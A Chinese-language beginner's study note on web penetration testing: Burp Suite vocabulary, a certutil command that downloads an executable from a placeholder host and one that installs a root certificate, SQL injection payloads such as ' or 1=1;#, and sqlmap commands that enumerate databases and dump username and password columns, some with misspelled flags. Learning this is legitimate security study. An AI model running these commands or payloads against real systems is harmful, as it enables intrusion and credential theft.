Burp抓包工具
proxy 代理 工具中是代理抓包
history 历史记录
options 选项 或者 设置
import 导入
export 导出
request 请求信息
response 返回信息
Windows 证书导入命令
下载文件
certutil
certutil -urlcache -split -f http://ip/artifact.exe
导入证书到根证书颁发机构
certutil.exe -addstore -f "Root" D:/ca.der
认识注入
? 标记后面的内容为url参数
& 拼接多个参数
' 或者 " SQL语句中 闭合
; 结束sql语句
select 选择
from 指向
where 条件
and 并且
or 或者
# sql语句中注释 不会执行
-- 注释
select * from user; 查询user表所有数据
select * from user where id=1; 查询表中id字段内容为1的数据
select * from user wehre id=1 and username='root'; 查询条件 id=1并且用户名为root
select * from user where id=1 or username='root'; 查询条件 id=1或者用户名为root
注入语句
正常语句:select * from user where id=1; 这个1是url传递过来的 ?uid=1
注入语句:select * from user where id=1 or 1=1; id=后面的内容是url传递的
例如:?uid=1 or 1=1
这条语句 1=1 表示为真 id=1 如果数据中存在则为真,不存在为假。
为条件为真才会返回数据,加入或者条件,第一个条件为真返回id=1的数据,第二个条件为真返回所有数据。
正常语句:select * from user where username='root'; ?uname=root
注入语句:select * from user where username='root' or 1=1;#' ?uname=root ' or 1=1; #
这里'root' 代表字符串,传入' 是闭合字符串,# 注释后面的' 避免sql语句报错
sqlmap 使用
- 程序是用python编程语言编写
- python 是脚本解释器
python sqlmap.py --help #查询帮助文档
batch 执行默认选项
level 等级
risk 探测风险等级
random-agent 随机user-agent
-r 读取文件 read
file.txt 保存请求包的文件
current 当前
user 用户
db 数据库 加s 代表多个 全称database
table 数据表
column 表中的 列名
常用命令
测试注入
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt
查询当前网站数据库所使用的用户
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt --current-user
如果是root权限的数据库可以获取所有数据
查询当前网站使用的数据库
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt --current-db
查询所有数据库
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt --dbs
查询所有某个数据库所有表 例如查询数据库 mysql 中所有表
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql --tables
根据表名查询所有列名字段
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql -T user --cloumns
查询表中所有数据
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql -T user --dumps
查询表中某几个字段的数据
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql -T user -C username,password --dumps
文件上传
XSS打cookie 钓鱼
XXE 注入
评论区